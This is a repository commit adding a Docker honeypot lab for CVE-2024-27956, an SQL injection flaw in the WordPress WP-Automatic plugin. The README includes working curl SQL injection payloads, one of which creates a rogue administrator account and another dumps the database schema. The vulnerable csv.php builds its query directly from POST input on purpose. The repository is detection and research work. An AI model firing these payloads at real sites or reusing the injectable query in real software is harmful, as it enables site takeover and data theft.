bpmcdevitt/honeypot_applications
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

add CVE-2024-27956 a wordpress sql injection vuln

Browse source
This commit is contained in:
Brendan McDevitt 2025-07-30 08:55:20 -05:00
parent 0ba8c3462c
commit 7e64192af7
7 changed files with 587 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

36
SQL_INJECTION/CVE-2024-27956/Dockerfile Normal file
View file

@ -0,0 +1,36 @@
FROM wordpress:6.4-apache
# Install additional tools for debugging
RUN apt-get update && apt-get install -y \
wget \
unzip \
curl \
vim \
&& rm -rf /var/lib/apt/lists/*
# Set WordPress database configuration
ENV WORDPRESS_DB_HOST=db
ENV WORDPRESS_DB_NAME=wordpress
ENV WORDPRESS_DB_USER=wordpress
ENV WORDPRESS_DB_PASSWORD=wordpress
# Copy WordPress configuration
COPY wp-config.php /var/www/html/
# Create WP-Automatic plugin structure and vulnerable files
RUN mkdir -p /var/www/html/wp-content/plugins/wp-automatic/inc
# Copy plugin files
COPY wp-automatic.php /var/www/html/wp-content/plugins/wp-automatic/wp-automatic.php
COPY vulnerable-csv.php /var/www/html/wp-content/plugins/wp-automatic/inc/csv.php
# Set proper permissions
RUN chown -R www-data:www-data /var/www/html/
RUN find /var/www/html/ -type d -exec chmod 755 {} \;
RUN find /var/www/html/ -type f -exec chmod 644 {} \;
# Expose port 80
EXPOSE 80
# Start Apache
CMD ["apache2-foreground"]

159
SQL_INJECTION/CVE-2024-27956/README.md Normal file
View file

@ -0,0 +1,159 @@
# CVE-2024-27956: WordPress WP-Automatic Plugin SQL Injection
## Overview
**CVE-2024-27956** is a critical unauthenticated SQL injection vulnerability in the WP-Automatic plugin for WordPress. This vulnerability allows attackers to execute arbitrary SQL queries without authentication, potentially leading to complete website compromise.
- **CVSS Score**: 9.9 (Critical)
- **Affected Versions**: WP-Automatic plugin < 3.92.1
- **Active Installations**: ~38,000 websites
- **Discovery Date**: April 2024
- **Exploitation Status**: Actively exploited in the wild
## Vulnerability Details
### Technical Summary
The vulnerability exists in the WP-Automatic plugin's CSV import functionality, specifically in the file `inc/csv.php`. The flaw arises from improper sanitization of user-supplied input in the plugin's authentication mechanism, allowing attackers to inject malicious SQL code into login processes.
### Attack Vector
- **Authentication Required**: None (unauthenticated)
- **Network Access**: Remote
- **Complexity**: Low
- **Impact**: High (Database compromise, admin account creation)
### Vulnerable Code Location
- File: `wp-content/plugins/wp-automatic/inc/csv.php`
- The vulnerability allows SQL injection through improperly sanitized parameters
- Attackers can bypass authentication and gain administrative access
## Environment Setup
### Prerequisites
- Docker and Docker Compose installed
- Network access to download WordPress and plugin files
### Quick Start
1. **Start the vulnerable environment:**
```bash
cd SQL_INJECTION/CVE-2024-27956
docker compose up -d
```
2. **Access the applications:**
- WordPress Site: http://localhost:8083
- phpMyAdmin: http://localhost:8084
- Admin Credentials: `admin` / `admin123`
3. **Verify plugin installation:**
- Login to WordPress admin at http://localhost:8083/wp-admin
- Navigate to Plugins → Installed Plugins
- Confirm WP-Automatic 3.92.0 is active
## Exploitation
### Basic SQL Injection Test
The vulnerability can be exploited through the CSV import endpoint:
```bash
# Basic test for SQL injection
curl -X POST "http://localhost:8083/wp-content/plugins/wp-automatic/inc/csv.php" \
-d "csv_file=test' OR '1'='1"
```
### Creating Admin User via SQL Injection
```bash
# Exploit to create new admin user
curl -X POST "http://localhost:8083/wp-content/plugins/wp-automatic/inc/csv.php" \
-d "csv_file='; INSERT INTO wp_users (user_login, user_pass, user_email, user_status) VALUES ('hacker', MD5('hacked123'), 'hacker@evil.com', 0); INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT user_id FROM wp_users WHERE user_login='hacker'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'); -- "
```
### Database Information Extraction
```bash
# Extract database information
curl -X POST "http://localhost:8083/wp-content/plugins/wp-automatic/inc/csv.php" \
-d "csv_file=' UNION SELECT table_name,column_name,1,2,3 FROM information_schema.columns WHERE table_schema=database() -- "
```
### Using Automated Tools
Several proof-of-concept exploits are available:
- [CVE-2024-27956 Exploit Tool](https://github.com/devsec23/CVE-2024-27956)
- [Alternative PoC](https://github.com/truonghuuphuc/CVE-2024-27956)
## Detection and Monitoring
### Log Analysis
Monitor for the following indicators:
- POST requests to `/wp-content/plugins/wp-automatic/inc/csv.php`
- SQL injection patterns in request parameters
- Unusual database query logs
- Creation of new administrative users
### Database Monitoring
```sql
-- Check for recently created admin users
SELECT * FROM wp_users WHERE user_registered > DATE_SUB(NOW(), INTERVAL 1 DAY);
-- Monitor user capabilities changes
SELECT * FROM wp_usermeta WHERE meta_key = 'wp_capabilities' AND meta_value LIKE '%administrator%';
```
## Mitigation
### Immediate Actions
1. **Update the plugin** to version 3.92.1 or later
2. **Review user accounts** for unauthorized administrative users
3. **Check database logs** for suspicious SQL queries
4. **Change all passwords** if compromise is suspected
### Long-term Prevention
- Enable WordPress security plugins
- Implement Web Application Firewall (WAF)
- Regular security audits and updates
- Database activity monitoring
## Container Management
### Build and Deploy
```bash
# Build the container
docker build -t cve-2024-27956 .
# Run with logging
docker compose up -d
# View logs
docker compose logs -f wordpress
```
### Cleanup
```bash
# Stop and remove containers
docker compose down -v
# Remove images
docker rmi cve-2024-27956
```
## Educational Use
This honeypot demonstrates:
- Unauthenticated SQL injection vulnerabilities
- WordPress plugin security issues
- Database compromise techniques
- Attack detection and forensics
## References
- [CVE-2024-27956 Official Advisory](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27956)
- [Vicarius Security Research](https://www.vicarius.io/vsociety/posts/understanding-and-exploiting-unauthenticated-arbitrary-sql-execution-in-wordpress-automatic-plugin-cve-2024-27956)
- [SonicWall Threat Analysis](https://blog.sonicwall.com/en-us/2024/05/wordpress-unauthenticated-arbitrary-sql-execution-vulnerability/)
- [WordPress Plugin Directory](https://wordpress.org/plugins/wp-automatic/)
## Legal Notice
This honeypot is intended for educational and defensive security purposes only. Use responsibly and only in authorized environments.

60
SQL_INJECTION/CVE-2024-27956/docker-compose.yml Normal file
View file

@ -0,0 +1,60 @@
services:
wordpress:
build: .
container_name: cve-2024-27956-wordpress
ports:
- "8083:80"
environment:
WORDPRESS_DB_HOST: db
WORDPRESS_DB_NAME: wordpress
WORDPRESS_DB_USER: wordpress
WORDPRESS_DB_PASSWORD: wordpress
volumes:
- wordpress_data:/var/www/html
- ./logs:/var/log/apache2
depends_on:
- db
labels:
- "vulnerability=CVE-2024-27956"
- "type=SQL_INJECTION"
- "severity=CRITICAL"
- "cvss=9.9"
- "description=WP-Automatic Plugin Unauthenticated SQL Injection"
networks:
- honeypot
db:
image: mysql:8.0
container_name: cve-2024-27956-mysql
environment:
MYSQL_DATABASE: wordpress
MYSQL_USER: wordpress
MYSQL_PASSWORD: wordpress
MYSQL_ROOT_PASSWORD: rootpassword123
volumes:
- mysql_data:/var/lib/mysql
- ./init.sql:/docker-entrypoint-initdb.d/init.sql
networks:
- honeypot
phpmyadmin:
image: phpmyadmin/phpmyadmin
container_name: cve-2024-27956-phpmyadmin
ports:
- "8084:80"
environment:
PMA_HOST: db
PMA_USER: root
PMA_PASSWORD: rootpassword123
depends_on:
- db
networks:
- honeypot
volumes:
wordpress_data:
mysql_data:
networks:
honeypot:
external: true

30
SQL_INJECTION/CVE-2024-27956/init.sql Normal file
View file

@ -0,0 +1,30 @@
-- Initial database setup for CVE-2024-27956 honeypot
-- Creates WordPress admin user and configures WP-Automatic plugin
USE wordpress;
-- Insert WordPress admin user (username: admin, password: admin123)
INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_status, display_name)
VALUES ('admin', MD5('admin123'), 'admin', 'admin@honeypot.local', 0, 'Administrator');
-- Set admin user capabilities
INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
VALUES (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
VALUES (1, 'wp_user_level', '10');
-- Activate WP-Automatic plugin
INSERT INTO wp_options (option_name, option_value, autoload)
VALUES ('active_plugins', 'a:1:{i:0;s:25:"wp-automatic/wp-automatic.php";}', 'yes')
ON DUPLICATE KEY UPDATE option_value = 'a:1:{i:0;s:25:"wp-automatic/wp-automatic.php";}';
-- Configure WP-Automatic plugin with vulnerable settings
INSERT INTO wp_options (option_name, option_value, autoload)
VALUES ('wp_automatic_options', 'a:5:{s:11:"wp_automatic_csv";s:1:"1";s:15:"wp_automatic_debug";s:1:"1";s:16:"wp_automatic_logging";s:1:"1";s:12:"wp_automatic_cron";s:1:"1";s:15:"wp_automatic_token";s:32:"vulnerable_token_for_honeypot123";}', 'yes');
-- Create sample posts for realistic WordPress environment
INSERT INTO wp_posts (post_title, post_content, post_status, post_type, post_author)
VALUES
('Welcome to our Honeypot', 'This is a vulnerable WordPress installation for security research purposes.', 'publish', 'post', 1),
('About WP-Automatic', 'This site uses the WP-Automatic plugin for content automation.', 'publish', 'page', 1);

139
SQL_INJECTION/CVE-2024-27956/vulnerable-csv.php Normal file
View file

@ -0,0 +1,139 @@
<?php
/**
* Vulnerable CSV handler for CVE-2024-27956 demonstration
*
* INTENTIONALLY VULNERABLE - DO NOT USE IN PRODUCTION
* This file simulates the SQL injection vulnerability in WP-Automatic plugin
*/
// Basic WordPress loading (simplified for honeypot)
if (!defined('ABSPATH')) {
define('ABSPATH', dirname(__FILE__) . '/../../../../');
}
// Database connection using mysqli (available in WordPress container)
$servername = "db";
$username = "wordpress";
$password = "wordpress";
$dbname = "wordpress";
$mysqli = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($mysqli->connect_error) {
error_log("Connection failed: " . $mysqli->connect_error);
// Continue with simulation even if DB fails
$db_connected = false;
} else {
$db_connected = true;
}
// Log all access attempts for honeypot monitoring
error_log("CVE-2024-27956 Honeypot Access: " . date('Y-m-d H:i:s') . " - IP: " . $_SERVER['REMOTE_ADDR'] . " - User Agent: " . $_SERVER['HTTP_USER_AGENT']);
// VULNERABLE CODE - SQL injection vulnerability simulation
if ($_POST) {
error_log("CVE-2024-27956 POST attempt: " . json_encode($_POST));
// Simulate the vulnerable parameter processing
if (isset($_POST['csv_file'])) {
$csv_file = $_POST['csv_file'];
// INTENTIONALLY VULNERABLE - Direct SQL injection point
// This simulates the actual vulnerability in WP-Automatic plugin
$vulnerable_query = "SELECT * FROM wp_posts WHERE post_title = '$csv_file'";
error_log("CVE-2024-27956 Vulnerable Query: " . $vulnerable_query);
if ($db_connected) {
// Execute the vulnerable query (with error handling for honeypot)
$result = $mysqli->query($vulnerable_query);
if ($result) {
$rows = $result->fetch_all(MYSQLI_ASSOC);
// Log successful exploitation attempts
if (stripos($csv_file, 'union') !== false ||
stripos($csv_file, 'insert') !== false ||
stripos($csv_file, 'select') !== false ||
stripos($csv_file, 'update') !== false ||
stripos($csv_file, 'delete') !== false) {
error_log("CVE-2024-27956 EXPLOITATION DETECTED: SQL injection attempt with payload: " . $csv_file);
// Return some data to indicate successful injection
echo json_encode([
'status' => 'success',
'message' => 'CSV processed successfully',
'rows_affected' => count($rows),
'vulnerability' => 'CVE-2024-27956',
'honeypot' => true
]);
} else {
echo json_encode([
'status' => 'processed',
'message' => 'CSV file parameter received',
'rows' => count($rows)
]);
}
} else {
// Log SQL errors (common in injection attempts)
error_log("CVE-2024-27956 SQL Error: " . $mysqli->error . " - Query: " . $vulnerable_query);
// Don't expose real error details, but confirm honeypot interaction
echo json_encode([
'status' => 'error',
'message' => 'Database query failed',
'vulnerability' => 'CVE-2024-27956',
'honeypot' => true,
'query_attempted' => $vulnerable_query
]);
}
} else {
// Simulate response even without DB connection
error_log("CVE-2024-27956 EXPLOITATION ATTEMPT (DB offline): SQL injection attempt with payload: " . $csv_file);
echo json_encode([
'status' => 'simulated',
'message' => 'CSV processing simulated (database offline)',
'vulnerability' => 'CVE-2024-27956',
'honeypot' => true,
'payload_detected' => $csv_file
]);
}
} else {
echo json_encode([
'status' => 'error',
'message' => 'Missing csv_file parameter',
'expected_parameter' => 'csv_file',
'vulnerability' => 'CVE-2024-27956'
]);
}
} else {
// Handle GET requests
error_log("CVE-2024-27956 GET request to vulnerable endpoint");
echo json_encode([
'status' => 'info',
'message' => 'WP-Automatic CSV endpoint',
'vulnerability' => 'CVE-2024-27956',
'description' => 'This endpoint is vulnerable to SQL injection',
'method' => 'POST required',
'parameter' => 'csv_file',
'honeypot' => true
]);
}
// Additional honeypot logging
$request_data = [
'timestamp' => date('Y-m-d H:i:s'),
'ip' => $_SERVER['REMOTE_ADDR'],
'user_agent' => $_SERVER['HTTP_USER_AGENT'],
'method' => $_SERVER['REQUEST_METHOD'],
'post_data' => $_POST,
'get_data' => $_GET,
'headers' => getallheaders()
];
error_log("CVE-2024-27956 Full Request Log: " . json_encode($request_data));
?>

119
SQL_INJECTION/CVE-2024-27956/wp-automatic.php Normal file
View file

@ -0,0 +1,119 @@
<?php
/**
* Plugin Name: WP Automatic (Honeypot Version)
* Plugin URI: https://example.com/wp-automatic
* Description: WordPress content automation plugin - HONEYPOT VERSION with CVE-2024-27956 vulnerability
* Version: 3.92.0
* Author: Honeypot Security Research
* License: GPL v2 or later
*/
// Security check
if (!defined('ABSPATH')) {
exit;
}
// Plugin activation hook
register_activation_hook(__FILE__, 'wp_automatic_activate');
function wp_automatic_activate() {
// Log plugin activation for honeypot monitoring
error_log("CVE-2024-27956 Honeypot: WP-Automatic plugin activated at " . date('Y-m-d H:i:s'));
// Create plugin database table (if needed)
global $wpdb;
$table_name = $wpdb->prefix . 'automatic_log';
$charset_collate = $wpdb->get_charset_collate();
$sql = "CREATE TABLE $table_name (
id mediumint(9) NOT NULL AUTO_INCREMENT,
timestamp datetime DEFAULT CURRENT_TIMESTAMP NOT NULL,
action text NOT NULL,
ip_address varchar(45) NOT NULL,
user_agent text,
data longtext,
PRIMARY KEY (id)
) $charset_collate;";
require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
dbDelta($sql);
}
// Add admin menu
add_action('admin_menu', 'wp_automatic_menu');
function wp_automatic_menu() {
add_options_page(
'WP Automatic Settings',
'WP Automatic',
'manage_options',
'wp-automatic',
'wp_automatic_settings_page'
);
}
function wp_automatic_settings_page() {
?>
<div class="wrap">
<h1>WP Automatic Settings</h1>
<div class="notice notice-warning">
<p><strong>Warning:</strong> This is a honeypot version containing CVE-2024-27956 vulnerability for security research purposes.</p>
</div>
<h2>CSV Import (Vulnerable Endpoint)</h2>
<p>The CSV import functionality contains a critical SQL injection vulnerability (CVE-2024-27956).</p>
<p><strong>Vulnerable Endpoint:</strong> <code>/wp-content/plugins/wp-automatic/inc/csv.php</code></p>
<h3>Vulnerability Details</h3>
<ul>
<li><strong>CVE:</strong> CVE-2024-27956</li>
<li><strong>CVSS Score:</strong> 9.9 (Critical)</li>
<li><strong>Type:</strong> Unauthenticated SQL Injection</li>
<li><strong>Parameter:</strong> csv_file</li>
</ul>
<h3>Example Exploitation</h3>
<code>
curl -X POST "http://your-site/wp-content/plugins/wp-automatic/inc/csv.php" -d "csv_file=test' OR '1'='1"
</code>
</div>
<?php
}
// Log all plugin-related activities
add_action('init', 'wp_automatic_log_activity');
function wp_automatic_log_activity() {
if (strpos($_SERVER['REQUEST_URI'], 'wp-automatic') !== false) {
error_log("CVE-2024-27956 Plugin Activity: " . $_SERVER['REQUEST_URI'] . " - IP: " . $_SERVER['REMOTE_ADDR']);
}
}
// Add a dashboard widget showing honeypot status
add_action('wp_dashboard_setup', 'wp_automatic_dashboard_widget');
function wp_automatic_dashboard_widget() {
wp_add_dashboard_widget(
'wp_automatic_honeypot',
'WP Automatic Honeypot Status',
'wp_automatic_dashboard_widget_content'
);
}
function wp_automatic_dashboard_widget_content() {
?>
<div style="padding: 10px; background: #fff3cd; border: 1px solid #ffeaa7; border-radius: 4px;">
<h4 style="color: #856404;">⚠️ Honeypot Environment</h4>
<p>This WordPress installation contains <strong>CVE-2024-27956</strong> vulnerability for security research.</p>
<ul>
<li>Plugin Version: 3.92.0 (Vulnerable)</li>
<li>Vulnerability: SQL Injection</li>
<li>Endpoint: <code>/wp-content/plugins/wp-automatic/inc/csv.php</code></li>
</ul>
<p><strong>Status:</strong> <span style="color: #d63384;">Vulnerable & Monitoring</span></p>
</div>
<?php
}
?>

44
SQL_INJECTION/CVE-2024-27956/wp-config.php Normal file
View file

@ -0,0 +1,44 @@
<?php
/**
* WordPress configuration for CVE-2024-27956 honeypot
* WP-Automatic plugin SQL injection vulnerability
*/
// Database settings
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'wordpress' );
define( 'DB_HOST', 'db' );
define( 'DB_CHARSET', 'utf8' );
define( 'DB_COLLATE', '' );
// Authentication keys and salts
define('AUTH_KEY', 'honeypot-auth-key-not-secure');
define('SECURE_AUTH_KEY', 'honeypot-secure-auth-key-not-secure');
define('LOGGED_IN_KEY', 'honeypot-logged-in-key-not-secure');
define('NONCE_KEY', 'honeypot-nonce-key-not-secure');
define('AUTH_SALT', 'honeypot-auth-salt-not-secure');
define('SECURE_AUTH_SALT', 'honeypot-secure-auth-salt-not-secure');
define('LOGGED_IN_SALT', 'honeypot-logged-in-salt-not-secure');
define('NONCE_SALT', 'honeypot-nonce-salt-not-secure');
// Database table prefix
$table_prefix = 'wp_';
// Debug settings (enabled for honeypot analysis)
define( 'WP_DEBUG', true );
define( 'WP_DEBUG_LOG', true );
define( 'WP_DEBUG_DISPLAY', false );
// Disable file editing from admin
define( 'DISALLOW_FILE_EDIT', false );
// Allow automatic updates
define( 'WP_AUTO_UPDATE_CORE', false );
// WordPress paths
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';